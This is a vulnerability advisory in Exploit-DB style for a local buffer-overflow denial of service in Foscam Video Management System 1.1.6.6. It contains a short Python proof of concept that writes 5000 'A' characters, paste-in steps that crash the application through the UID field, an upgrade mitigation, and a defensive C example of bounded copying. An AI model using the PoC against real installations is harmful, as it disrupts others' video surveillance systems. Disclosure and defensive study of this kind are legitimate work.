Vendor: Foscam Video Management System
By: Alessandro Magnosi
CVSS: 7.5 (HIGH)
Type: Denial of Service (DoS) Local
CWE: 119
Product Name: Foscam Video Management System
Affected Version From: 1.1.6.6
Affected Version To: 1.1.6.6
Patch Exists: YES
Related CWE: N/A
CPE: a:foscam:foscam_video_management_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 SP1 x86 en, Windows 10 Pro x64 it
2019

Foscam Video Management System 1.1.6.6 – ‘UID’ Denial of Service (PoC)

A buffer overflow vulnerability exists in Foscam Video Management System 1.1.6.6 that could allow an attacker to cause a denial of service condition. To trigger it, the attacker first runs a Python script that creates a file containing a large amount of data (5000 "A" characters in the PoC below), then copies the content of that file into the UID field of the Add Device page in the FoscamVMS application. This causes the application to crash.

Mitigation:

Upgrade to the latest version of Foscam Video Management System.
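
For developers handling a field like UID, the following added example (not Foscam's code and not part of the original advisory) shows a length-checked copy into a fixed-size buffer, rejecting input of the size the PoC generates. UID_MAX_LEN, uid_copy_checked and the other names are hypothetical; the real buffer size in FoscamVMS is not given on this page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed field capacity; the real limit in FoscamVMS is not stated on the page. */
#define UID_MAX_LEN ((size_t)32)

enum uid_status { UID_OK = 0, UID_BAD_ARG = -1, UID_EMPTY = -2, UID_TOO_LONG = -3 };

char demo_uid[UID_MAX_LEN + 1];   /* destination buffer used by the demo below */

/* Replaces an unbounded copy such as strcpy(uid, field_text) (hypothetical).
 * Copies untrusted field text into dst only if it fits in dst_size bytes and
 * within UID_MAX_LEN. The length scan is bounded, so an oversized input is
 * rejected after limit + 1 bytes. On rejection dst holds an empty string. */
enum uid_status uid_copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t limit, len;
    if (dst == NULL || dst_size == 0 || src == NULL)
        return UID_BAD_ARG;
    dst[0] = '\0';
    limit = (dst_size - 1 < UID_MAX_LEN) ? dst_size - 1 : UID_MAX_LEN;
    for (len = 0; len <= limit && src[len] != '\0'; len++)
        ;
    if (len == 0)
        return UID_EMPTY;
    if (len > limit)
        return UID_TOO_LONG;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return UID_OK;
}

/* Constructed input: 5000 'A' characters, the size the PoC file uses. */
enum uid_status uid_check_oversized(void)
{
    static char big[5001];
    memset(big, 'A', 5000);
    big[5000] = '\0';
    return uid_copy_checked(demo_uid, sizeof demo_uid, big);
}

int main(void)
{
    printf("short: %d\n", uid_copy_checked(demo_uid, sizeof demo_uid, "ABCD1234"));
    printf("oversized: %d\n", uid_check_oversized());
    return 0;
}
```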

Exploit-DB raw data:

# Exploit Title: Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)
# Author: Alessandro Magnosi
# Date: 2019-10-09
# Vendor Homepage: https://www.foscam.com/
# Software Link : https://www.foscam.com/downloads/appsoftware.html?id=5
# Tested Version: 1.1.6.6
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 SP1 x86 en, Windows 10 Pro x64 it

# Steps to Produce the Crash: 
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.6.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"
# 6.- Copy the content of the file into UID
# 7.- Click on Login Check
# 8.- Crashed

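#!/usr/bin/python

# Build the 5000-character string that is pasted into the UID field
buffer = "A" * 5000

# Write it to the file opened in step 2
with open("FoscamVMS1.1.6.txt", "w") as f:
    f.write(buffer)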